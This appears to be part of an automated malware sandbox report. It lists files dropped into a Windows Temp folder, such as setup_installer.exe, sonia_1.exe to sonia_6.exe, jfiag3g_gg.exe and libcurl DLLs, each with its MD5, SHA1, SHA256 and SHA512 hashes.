                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.txt
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_2.exe
                                                      MD5

                                                      18ffdaa7a2c9906db10ffc13f7c73d23

                                                      SHA1

                                                      f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                      SHA256

                                                      365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                      SHA512

                                                      db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_2.txt
                                                      MD5

                                                      18ffdaa7a2c9906db10ffc13f7c73d23

                                                      SHA1

                                                      f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                      SHA256

                                                      365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                      SHA512

                                                      db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_3.exe
                                                      MD5

                                                      ee658be7ea7269085f4004d68960e547

                                                      SHA1

                                                      979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                      SHA256

                                                      d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                      SHA512

                                                      fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_3.txt
                                                      MD5

                                                      ee658be7ea7269085f4004d68960e547

                                                      SHA1

                                                      979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                      SHA256

                                                      d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                      SHA512

                                                      fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_4.exe
                                                      MD5

                                                      6765fe4e4be8c4daf3763706a58f42d0

                                                      SHA1

                                                      cebb504bfc3097a95d40016f01123b275c97d58c

                                                      SHA256

                                                      755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                      SHA512

                                                      c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_4.txt
                                                      MD5

                                                      6765fe4e4be8c4daf3763706a58f42d0

                                                      SHA1

                                                      cebb504bfc3097a95d40016f01123b275c97d58c

                                                      SHA256

                                                      755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                      SHA512

                                                      c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_5.exe
                                                      MD5

                                                      0c3f670f496ffcf516fe77d2a161a6ee

                                                      SHA1

                                                      0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                      SHA256

                                                      8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                      SHA512

                                                      bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_5.txt
                                                      MD5

                                                      0c3f670f496ffcf516fe77d2a161a6ee

                                                      SHA1

                                                      0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                      SHA256

                                                      8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                      SHA512

                                                      bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_6.exe
                                                      MD5

                                                      2eb68e495e4eb18c86a443b2754bbab2

                                                      SHA1

                                                      82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                      SHA256

                                                      a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                      SHA512

                                                      f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_6.txt
                                                      MD5

                                                      2eb68e495e4eb18c86a443b2754bbab2

                                                      SHA1

                                                      82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                      SHA256

                                                      a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                      SHA512

                                                      f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      MD5

                                                      7fee8223d6e4f82d6cd115a28f0b6d58

                                                      SHA1

                                                      1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                      SHA256

                                                      a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                      SHA512

                                                      3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      MD5

                                                      7fee8223d6e4f82d6cd115a28f0b6d58

                                                      SHA1

                                                      1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                      SHA256

                                                      a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                      SHA512

                                                      3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                      MD5

                                                      74231678f536a19b3016840f56b845c7

                                                      SHA1

                                                      a5645777558a7d5905e101e54d61b0c8c1120de3

                                                      SHA256

                                                      cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                      SHA512

                                                      4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                      MD5

                                                      74231678f536a19b3016840f56b845c7

                                                      SHA1

                                                      a5645777558a7d5905e101e54d61b0c8c1120de3

                                                      SHA256

                                                      cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                      SHA512

                                                      4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libcurl.dll
                                                      MD5

                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                      SHA1

                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                      SHA256

                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                      SHA512

                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libcurlpp.dll
                                                      MD5

                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                      SHA1

                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                      SHA256

                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                      SHA512

                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libgcc_s_dw2-1.dll
                                                      MD5

                                                      9aec524b616618b0d3d00b27b6f51da1

                                                      SHA1

                                                      64264300801a353db324d11738ffed876550e1d3

                                                      SHA256

                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                      SHA512

                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libstdc++-6.dll
                                                      MD5

                                                      5e279950775baae5fea04d2cc4526bcc

                                                      SHA1

                                                      8aef1e10031c3629512c43dd8b0b5d9060878453

                                                      SHA256

                                                      97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                      SHA512

                                                      666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libwinpthread-1.dll
                                                      MD5

                                                      1e0d62c34ff2e649ebc5c372065732ee

                                                      SHA1

                                                      fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                      SHA256

                                                      509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                      SHA512

                                                      3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
                                                      MD5

                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                      SHA1

                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                      SHA256

                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                      SHA512

                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
                                                      MD5

                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                      SHA1

                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                      SHA256

                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                      SHA512

                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
                                                      MD5

                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                      SHA1

                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                      SHA256

                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                      SHA512

                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
                                                      MD5

                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                      SHA1

                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                      SHA256

                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                      SHA512

                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
                                                      MD5

                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                      SHA1

                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                      SHA256

                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                      SHA512

                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
                                                      MD5

                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                      SHA1

                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                      SHA256

                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                      SHA512

                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_2.exe
                                                      MD5

                                                      18ffdaa7a2c9906db10ffc13f7c73d23

                                                      SHA1

                                                      f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                      SHA256

                                                      365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                      SHA512

                                                      db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_2.exe
                                                      MD5

                                                      18ffdaa7a2c9906db10ffc13f7c73d23

                                                      SHA1

                                                      f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                      SHA256

                                                      365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                      SHA512

                                                      db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_2.exe
                                                      MD5

                                                      18ffdaa7a2c9906db10ffc13f7c73d23

                                                      SHA1

                                                      f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                      SHA256

                                                      365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                      SHA512

                                                      db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_2.exe
                                                      MD5

                                                      18ffdaa7a2c9906db10ffc13f7c73d23

                                                      SHA1

                                                      f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                      SHA256

                                                      365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                      SHA512

                                                      db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_3.exe
                                                      MD5

                                                      ee658be7ea7269085f4004d68960e547

                                                      SHA1

                                                      979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                      SHA256

                                                      d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                      SHA512

                                                      fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_3.exe
                                                      MD5

                                                      ee658be7ea7269085f4004d68960e547

                                                      SHA1

                                                      979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                      SHA256

                                                      d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                      SHA512

                                                      fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_3.exe
                                                      MD5

                                                      ee658be7ea7269085f4004d68960e547

                                                      SHA1

                                                      979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                      SHA256

                                                      d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                      SHA512

                                                      fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_3.exe
                                                      MD5

                                                      ee658be7ea7269085f4004d68960e547

                                                      SHA1

                                                      979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                      SHA256

                                                      d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                      SHA512

                                                      fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_4.exe
                                                      MD5

                                                      6765fe4e4be8c4daf3763706a58f42d0

                                                      SHA1

                                                      cebb504bfc3097a95d40016f01123b275c97d58c

                                                      SHA256

                                                      755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                      SHA512

                                                      c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_5.exe
                                                      MD5

                                                      0c3f670f496ffcf516fe77d2a161a6ee

                                                      SHA1

                                                      0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                      SHA256

                                                      8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                      SHA512

                                                      bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_5.exe
                                                      MD5

                                                      0c3f670f496ffcf516fe77d2a161a6ee

                                                      SHA1

                                                      0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                      SHA256

                                                      8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                      SHA512

                                                      bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_5.exe
                                                      MD5

                                                      0c3f670f496ffcf516fe77d2a161a6ee

                                                      SHA1

                                                      0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                      SHA256

                                                      8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                      SHA512

                                                      bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_6.exe
                                                      MD5

                                                      2eb68e495e4eb18c86a443b2754bbab2

                                                      SHA1

                                                      82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                      SHA256

                                                      a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                      SHA512

                                                      f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_6.exe
                                                      MD5

                                                      2eb68e495e4eb18c86a443b2754bbab2

                                                      SHA1

                                                      82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                      SHA256

                                                      a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                      SHA512

                                                      f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                    • \Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_6.exe
                                                      MD5

                                                      2eb68e495e4eb18c86a443b2754bbab2

                                                      SHA1

                                                      82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                      SHA256

                                                      a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                      SHA512

                                                      f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                    • \Users\Admin\AppData\Local\Temp\CC4F.tmp
                                                      MD5

                                                      d124f55b9393c976963407dff51ffa79

                                                      SHA1

                                                      2c7bbedd79791bfb866898c85b504186db610b5d

                                                      SHA256

                                                      ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef

                                                      SHA512

                                                      278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

                                                    • \Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      MD5

                                                      7fee8223d6e4f82d6cd115a28f0b6d58

                                                      SHA1

                                                      1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                      SHA256

                                                      a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                      SHA512

                                                      3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                    • \Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      MD5

                                                      7fee8223d6e4f82d6cd115a28f0b6d58

                                                      SHA1

                                                      1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                      SHA256

                                                      a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                      SHA512

                                                      3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                    • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                      MD5

                                                      74231678f536a19b3016840f56b845c7

                                                      SHA1

                                                      a5645777558a7d5905e101e54d61b0c8c1120de3

                                                      SHA256

                                                      cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                      SHA512

                                                      4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                    • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                      MD5

                                                      74231678f536a19b3016840f56b845c7

                                                      SHA1

                                                      a5645777558a7d5905e101e54d61b0c8c1120de3

                                                      SHA256

                                                      cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                      SHA512

                                                      4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                    • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                      MD5

                                                      74231678f536a19b3016840f56b845c7

                                                      SHA1

                                                      a5645777558a7d5905e101e54d61b0c8c1120de3

                                                      SHA256

                                                      cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                      SHA512

                                                      4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                    • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                      MD5

                                                      74231678f536a19b3016840f56b845c7

                                                      SHA1

                                                      a5645777558a7d5905e101e54d61b0c8c1120de3

                                                      SHA256

                                                      cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                      SHA512

                                                      4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

